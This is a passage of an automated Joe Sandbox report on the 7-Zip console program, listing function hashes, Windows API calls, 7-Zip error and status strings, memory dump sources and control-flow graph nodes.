                                                                                                                                                                                                                                                  • Opcode ID: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
                                                                                                                                                                                                                                                  • Instruction ID: 2a4ccbdd6612da630262adf4cf9ac361585e3e5a197f8bc6b642c2d5aa29c4d6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01427037219AC086CB24DF2AE0A07AEB765F3CAB88F555461EB5E87B15CF39C485C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Cannot find archive name, xrefs: 0098110A
                                                                                                                                                                                                                                                  • Cannot use absolute pathnames for this command, xrefs: 0098138C
                                                                                                                                                                                                                                                  • Unsupported command:, xrefs: 00980E57
                                                                                                                                                                                                                                                  • -ai switch is not supported for this command, xrefs: 009815C3
                                                                                                                                                                                                                                                  • stdout mode and email mode cannot be combined, xrefs: 00981710
                                                                                                                                                                                                                                                  • I won't write data and program's messages to same stream, xrefs: 009814B3, 00981782
                                                                                                                                                                                                                                                  • Incorrect Number of benmchmark iterations, xrefs: 00981847
                                                                                                                                                                                                                                                  • I won't write compressed data to a terminal, xrefs: 00981741
                                                                                                                                                                                                                                                  • Unsupported -spf:, xrefs: 00980F7E
                                                                                                                                                                                                                                                  • The command must be specified, xrefs: 00980DF5
                                                                                                                                                                                                                                                  • Archive name cannot by empty, xrefs: 00981151
                                                                                                                                                                                                                                                  • Only one archive can be created with rename command, xrefs: 009817E1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrow$free$wcscmp
                                                                                                                                                                                                                                                  • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                                                                                                                                                                                                  • API String ID: 1252877886-1892825451
                                                                                                                                                                                                                                                  • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                                  • Instruction ID: 4494e37a52e90d70e8884aa83ff0b978af0cd728354dc14098ea5835e475f76a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8352D2733086C5A6DB28EF29D1907EEBB69F395744F888016D79D03B22DB78D5A9C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                  • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                                                  • API String ID: 1313864721-2333288578
                                                                                                                                                                                                                                                  • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                                  • Instruction ID: 65e239859849ed19326e55252678024993c50f5a3930effb3a12fcefac993789
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1116672208B44C2DA00DB16FE5436DB3AEFBC4B95F940416E98B42B95CF3CC44AC710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0097AC84
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32 ref: 0097AC95
                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32 ref: 0097ACA9
                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0097F928), ref: 0097ACE0
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0097F928), ref: 0097ACEA
                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE ref: 0097ACFA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3398352648-0
                                                                                                                                                                                                                                                  • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                                  • Instruction ID: b5c530f0ebe4268fd12dc6a3eb70df32684be1e90aed42ba008c5046f581800a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301CC7361468187DB208FA8FD9038E33A0F780B91F548435EB8A82A64CF3CC889CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0097794C: FindClose.KERNELBASE ref: 0097795E
                                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE ref: 009779BA
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2
                                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE ref: 009779FA
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00977A08
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2921071498-0
                                                                                                                                                                                                                                                  • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                                  • Instruction ID: 11574df32454c3f00b98dff259873c1ae15908acf7c49cfe61918e106437f4fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E210A37208A8086DB25DF65E85035DA365F78A7B8F548721EABD877D9DF38CA09C700
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                                                                                                  • API String ID: 0-2438533581
                                                                                                                                                                                                                                                  • Opcode ID: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
                                                                                                                                                                                                                                                  • Instruction ID: deb0952d80be19054a46f04ec30129318dfc1bc6a34184f6df62ed00b286bfed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65036233248AC182CA34EB25E4907AEB765F7C5BC0F958116EB9E87B25DF79C985C700

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1016 9b950d-9b9510 1017 9b9a40-9b9a8e call 972130 1016->1017 1018 9b9516-9b9529 call 97ed74 1016->1018 1028 9b9aa2 1017->1028 1029 9b9a90-9b9aa0 call 973314 1017->1029 1024 9b952f-9b9537 1018->1024 1025 9b9820-9b9828 1018->1025 1030 9b9539-9b9541 1024->1030 1031 9b9557-9b95d5 call 9b3230 call 973208 1024->1031 1026 9b982e-9b983f call 9b78a8 1025->1026 1027 9b99e4-9b99ee 1025->1027 1048 9b984c-9b994d call 9b6990 call 972bc8 call 997880 call 972bc8 call 972cdc call 9b6c04 1026->1048 1049 9b9841-9b9845 1026->1049 1035 9b9a20-9b9a3f _CxxThrowException 1027->1035 1036 9b99f0-9b9a1b call 972300 fputs * 2 call 972300 1027->1036 1033 9b9aa5-9b9ac8 call 97b8f0 call 972130 1028->1033 1029->1033 1030->1031 1032 9b9543-9b9552 call 973518 1030->1032 1056 9b95d7-9b95df 1031->1056 1057 9b95e5 1031->1057 1032->1031 1059 9b9aca-9b9ada call 973314 1033->1059 1060 9b9adc 1033->1060 1035->1017 1036->1035 1101 9b994f 1048->1101 1102 9b9980-9b99df free * 5 call 9b6a20 1048->1102 1049->1048 1056->1057 1061 9b95e1-9b95e3 1056->1061 1062 9b95e8-9b9631 call 973404 call 9b780c 1057->1062 1065 9b9adf-9b9c8b call 97b8f0 call 972130 1059->1065 1060->1065 1061->1062 1079 9b963e-9b964d 1062->1079 1080 9b9633-9b9637 1062->1080 1089 9b9c9a 1065->1089 1090 9b9c8d-9b9c98 call 9b7414 1065->1090 1082 9b964f-9b9657 1079->1082 1083 9b9663 1079->1083 1080->1079 1082->1083 1086 9b9659-9b9661 1082->1086 1087 9b966b-9b972c call 973404 call 9b6990 call 972bc8 1083->1087 1086->1087 1119 9b972f call 9a99b8 1087->1119 1094 9b9c9d-9b9ca8 1089->1094 1090->1094 1098 9b9caa-9b9cb3 1094->1098 1099 9b9cb4-9b9d77 call 973404 1094->1099 1098->1099 1115 9b9d79-9b9d7d 1099->1115 1116 9b9d83-9b9e8a call 9b71ec call 973404 call 97ef70 call 973208 call 996be0 1099->1116 1106 9b9953-9b9969 1101->1106 1113 9ba5ad-9ba5b5 1102->1113 1111 9b997b-9b997e 1106->1111 1112 9b996b-9b9976 free * 2 1106->1112 1111->1102 1111->1106 1112->1111 1117 9ba5b7-9ba5be 1113->1117 1118 9ba5c5-9ba5c8 1113->1118 1115->1116 1160 9b9e8c-9b9eb4 call 996e08 1116->1160 1161 9b9ed2-9b9f44 call 995458 1116->1161 1117->1118 1122 9ba5c0 1117->1122 1123 9ba5ca-9ba5e6 _CxxThrowException 1118->1123 1124 9ba5e7-9ba603 free 1118->1124 1125 9b9734-9b973f 1119->1125 1127 9ba5c0 call 9b66a8 1122->1127 1123->1124 1128 9ba626-9ba637 free call 99a13c 1124->1128 1129 9ba605 1124->1129 1130 9b9741-9b974b call 9bb1c8 1125->1130 1131 9b9750-9b9798 call 9b6c04 1125->1131 1127->1118 1139 9ba63c-9ba675 call 9b7080 call 97182c call 9b7f50 1128->1139 1134 9ba609-9ba624 free 1129->1134 1130->1131 1140 9b97cb-9b981b free * 3 call 9b6a20 free call 9bb310 1131->1140 1141 9b979a 1131->1141 1134->1128 1134->1134 1162 9ba6a8-9ba6c9 free 1139->1162 1163 9ba677 1139->1163 1140->1113 1144 9b979e-9b97b4 1141->1144 1148 9b97c6-9b97c9 1144->1148 1149 9b97b6-9b97c1 free * 2 1144->1149 1148->1140 1148->1144 1149->1148 1160->1161 1174 9b9eb6-9b9ed1 _CxxThrowException 1160->1174 1169 9b9f49-9b9f53 1161->1169 1166 9ba67b-9ba691 1163->1166 1172 9ba6a3-9ba6a6 1166->1172 1173 9ba693-9ba69e free * 2 1166->1173 1170 9b9f60-9b9f68 1169->1170 1171 9b9f55-9b9f5b call 9bb1c8 1169->1171 1176 9b9f6a-9b9f74 1170->1176 1177 9b9fbd-9b9fca 1170->1177 1171->1170 1172->1162 1172->1166 1173->1172 1174->1161 1178 9b9fb1-9b9fb9 1176->1178 1179 9b9f76-9b9fac call 972300 fputs call 972300 call 972320 call 972300 1176->1179 1180 9ba02c-9ba033 1177->1180 1181 9b9fcc-9b9fcf call 972300 1177->1181 1178->1177 1179->1178 1183 9ba063-9ba06a 1180->1183 1184 9ba035-9ba03a 1180->1184 1188 9b9fd4-9b9fdc 1181->1188 1186 9ba09e-9ba0a1 1183->1186 1187 9ba06c-9ba071 1183->1187 1184->1183 1190 9ba03c-9ba05e fputs call 9726a0 call 972300 1184->1190 1192 9ba114-9ba11b 1186->1192 1194 9ba0a3-9ba0aa 1186->1194 1191 9ba077-9ba099 fputs call 9726a0 call 972300 1187->1191 1187->1192 1188->1180 1193 9b9fde-9ba027 fputs call 9726a0 call 972300 fputs call 9726a0 call 972300 1188->1193 1190->1183 1191->1186 1199 9ba11d-9ba122 1192->1199 1200 9ba15c-9ba15f 1192->1200 1193->1180 1201 9ba0ac-9ba0ce fputs call 9726a0 call 972300 1194->1201 1202 9ba0d3-9ba0da 1194->1202 1207 9ba161 1199->1207 1208 9ba124-9ba133 call 972300 1199->1208 1200->1207 1212 9ba16c-9ba16f 1200->1212 1201->1202 1202->1192 1211 9ba0dc-9ba0eb call 972300 1202->1211 1207->1212 1208->1207 1234 9ba135-9ba157 fputs call 9726a0 call 972300 1208->1234 1211->1192 1235 9ba0ed-9ba10f fputs call 9726a0 call 972300 1211->1235 1220 9ba320-9ba50a free * 2 call 996b58 free call 9b7968 1212->1220 1221 9ba175-9ba17c 1212->1221 1269 9ba53d-9ba559 free 1220->1269 1270 9ba50c 1220->1270 1222 9ba182-9ba189 1221->1222 1223 9ba2e7-9ba2f6 call 972300 1221->1223 1222->1223 1231 9ba18f-9ba192 1222->1231 1223->1220 1247 9ba2f8-9ba31f fputs call 9726a0 call 972300 1223->1247 1231->1220 1238 9ba198-9ba1a3 1231->1238 1234->1200 1235->1192 1244 9ba1d5-9ba1de 1238->1244 1245 9ba1a5-9ba1cd fputs call 9726a0 call 972300 1238->1245 1251 9ba1f3-9ba223 fputs call 9726a0 call 972300 1244->1251 1252 9ba1e0-9ba1e3 1244->1252 1245->1244 1247->1220 1262 9ba275-9ba2c3 fputs call 9726a0 call 972300 fputs call 9726a0 call 972300 1251->1262 1276 9ba225-9ba270 fputs call 9726a0 call 972300 fputs call 9726a0 call 972300 1251->1276 1252->1251 1257 9ba1e5-9ba1ed 1252->1257 1257->1251 1257->1262 1291 9ba2c8-9ba2cb 1262->1291 1272 9ba55b 1269->1272 1273 9ba58c-9ba599 free 1269->1273 1271 9ba510-9ba526 1270->1271 1277 9ba538-9ba53b 1271->1277 1278 9ba528-9ba533 free * 2 1271->1278 1279 9ba55f-9ba575 1272->1279 1273->1113 1276->1262 1277->1269 1277->1271 1278->1277 1282 9ba587-9ba58a 1279->1282 1283 9ba577-9ba582 free * 2 1279->1283 1282->1273 1282->1279 1283->1282 1291->1220 1293 9ba2cd-9ba2e5 call 972300 call 9b291c 1291->1293 1293->1220
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                                                                                                  • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                                                                                                  • API String ID: 1639683984-435538426
                                                                                                                                                                                                                                                  • Opcode ID: 8784a05a3ae184111950cd8eaa0e251a67557ac8d46b019d5a78a4e0f167a5fc
                                                                                                                                                                                                                                                  • Instruction ID: e07561aaecee828f3651527cfe61708cc64e3271a9fd41bf0ea4b16d4f59f639
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8784a05a3ae184111950cd8eaa0e251a67557ac8d46b019d5a78a4e0f167a5fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37728772229AC095CA30EF25E9903EEB3A4F7C5B90F808526DB9E47B19DF38C555CB01

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1833 9b9b5d-9b9b5f 1834 9b9b79-9b9c1f call 9b057c call 973208 call 9938e8 free 1833->1834 1835 9b9b61-9b9b74 fputs call 972300 1833->1835 1843 9b9c21-9b9c2b call 9bb1c8 1834->1843 1844 9b9c30-9b9c33 1834->1844 1835->1834 1843->1844 1845 9b9c35-9b9c3c 1844->1845 1846 9b9c54-9b9c8b call 9bb310 call 972130 1844->1846 1845->1846 1848 9b9c3e-9b9c4e call 9b0994 1845->1848 1857 9b9c9a 1846->1857 1858 9b9c8d-9b9c98 call 9b7414 1846->1858 1852 9b9c53 1848->1852 1852->1846 1860 9b9c9d-9b9ca8 1857->1860 1858->1860 1862 9b9caa-9b9cb3 1860->1862 1863 9b9cb4-9b9d77 call 973404 1860->1863 1862->1863 1867 9b9d79-9b9d7d 1863->1867 1868 9b9d83-9b9e8a call 9b71ec call 973404 call 97ef70 call 973208 call 996be0 1863->1868 1867->1868 1879 9b9e8c-9b9eb4 call 996e08 1868->1879 1880 9b9ed2-9b9f53 call 995458 1868->1880 1879->1880 1887 9b9eb6-9b9ed1 _CxxThrowException 1879->1887 1885 9b9f60-9b9f68 1880->1885 1886 9b9f55-9b9f5b call 9bb1c8 1880->1886 1889 9b9f6a-9b9f74 1885->1889 1890 9b9fbd-9b9fca 1885->1890 1886->1885 1887->1880 1891 9b9fb1-9b9fb9 1889->1891 1892 9b9f76-9b9fac call 972300 fputs call 972300 call 972320 call 972300 1889->1892 1893 9ba02c-9ba033 1890->1893 1894 9b9fcc-9b9fcf call 972300 1890->1894 1891->1890 1892->1891 1896 9ba063-9ba06a 1893->1896 1897 9ba035-9ba03a 1893->1897 1901 9b9fd4-9b9fdc 1894->1901 1899 9ba09e-9ba0a1 1896->1899 1900 9ba06c-9ba071 1896->1900 1897->1896 1903 9ba03c-9ba05e fputs call 9726a0 call 972300 1897->1903 1905 9ba114-9ba11b 1899->1905 1907 9ba0a3-9ba0aa 1899->1907 1904 9ba077-9ba099 fputs call 9726a0 call 972300 1900->1904 1900->1905 1901->1893 1906 9b9fde-9ba027 fputs call 9726a0 call 972300 fputs call 9726a0 call 972300 1901->1906 1903->1896 1904->1899 1912 9ba11d-9ba122 1905->1912 1913 9ba15c-9ba15f 1905->1913 1906->1893 1914 9ba0ac-9ba0ce fputs call 9726a0 call 972300 1907->1914 1915 9ba0d3-9ba0da 1907->1915 1920 9ba161 1912->1920 1921 9ba124-9ba133 call 972300 1912->1921 1913->1920 1925 9ba16c-9ba16f 1913->1925 1914->1915 1915->1905 1924 9ba0dc-9ba0eb call 972300 1915->1924 1920->1925 1921->1920 1947 9ba135-9ba157 fputs call 9726a0 call 972300 1921->1947 1924->1905 1948 9ba0ed-9ba10f fputs call 9726a0 call 972300 1924->1948 1933 9ba320-9ba50a free * 2 call 996b58 free call 9b7968 1925->1933 1934 9ba175-9ba17c 1925->1934 1982 9ba53d-9ba559 free 1933->1982 1983 9ba50c 1933->1983 1935 9ba182-9ba189 1934->1935 1936 9ba2e7-9ba2f6 call 972300 1934->1936 1935->1936 1944 9ba18f-9ba192 1935->1944 1936->1933 1960 9ba2f8-9ba31f fputs call 9726a0 call 972300 1936->1960 1944->1933 1951 9ba198-9ba1a3 1944->1951 1947->1913 1948->1905 1957 9ba1d5-9ba1de 1951->1957 1958 9ba1a5-9ba1cd fputs call 9726a0 call 972300 1951->1958 1964 9ba1f3-9ba223 fputs call 9726a0 call 972300 1957->1964 1965 9ba1e0-9ba1e3 1957->1965 1958->1957 1960->1933 1975 9ba275-9ba2c3 fputs call 9726a0 call 972300 fputs call 9726a0 call 972300 1964->1975 1989 9ba225-9ba270 fputs call 9726a0 call 972300 fputs call 9726a0 call 972300 1964->1989 1965->1964 1970 9ba1e5-9ba1ed 1965->1970 1970->1964 1970->1975 2015 9ba2c8-9ba2cb 1975->2015 1985 9ba55b 1982->1985 1986 9ba58c-9ba5b5 free 1982->1986 1984 9ba510-9ba526 1983->1984 1990 9ba538-9ba53b 1984->1990 1991 9ba528-9ba533 free * 2 1984->1991 1992 9ba55f-9ba575 1985->1992 1996 9ba5b7-9ba5be 1986->1996 1997 9ba5c5-9ba5c8 1986->1997 1989->1975 1990->1982 1990->1984 1991->1990 1998 9ba587-9ba58a 1992->1998 1999 9ba577-9ba582 free * 2 1992->1999 1996->1997 2002 9ba5c0 call 9b66a8 1996->2002 2003 9ba5ca-9ba5e6 _CxxThrowException 1997->2003 2004 9ba5e7-9ba603 free 1997->2004 1998->1986 1998->1992 1999->1998 2002->1997 2003->2004 2008 9ba626-9ba637 free call 99a13c 2004->2008 2009 9ba605 2004->2009 2017 9ba63c-9ba675 call 9b7080 call 97182c call 9b7f50 2008->2017 2012 9ba609-9ba624 free 2009->2012 2012->2008 2012->2012 2015->1933 2018 9ba2cd-9ba2e5 call 972300 call 9b291c 2015->2018 2031 9ba6a8-9ba6c9 free 2017->2031 2032 9ba677 2017->2032 2018->1933 2033 9ba67b-9ba691 2032->2033 2035 9ba6a3-9ba6a6 2033->2035 2036 9ba693-9ba69e free * 2 2033->2036 2035->2031 2035->2033 2036->2035
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputcfputsfree
                                                                                                                                                                                                                                                  • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                                                                                                                                  • API String ID: 2822829076-727241755
                                                                                                                                                                                                                                                  • Opcode ID: 0ebe1bfe7f3dee7155bcc7c41e20fa3a66a5d9dc50dd3a317a4ebc43c7d4f5c7
                                                                                                                                                                                                                                                  • Instruction ID: 151112cc01f41f72f14206c398eade1d5d4e8193b0d0698121742072a1f73536
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ebe1bfe7f3dee7155bcc7c41e20fa3a66a5d9dc50dd3a317a4ebc43c7d4f5c7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD226572319AC192CA34EB25E9913EEB3A4F7C5B90F848122DB9E47B19DF38C555CB01

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
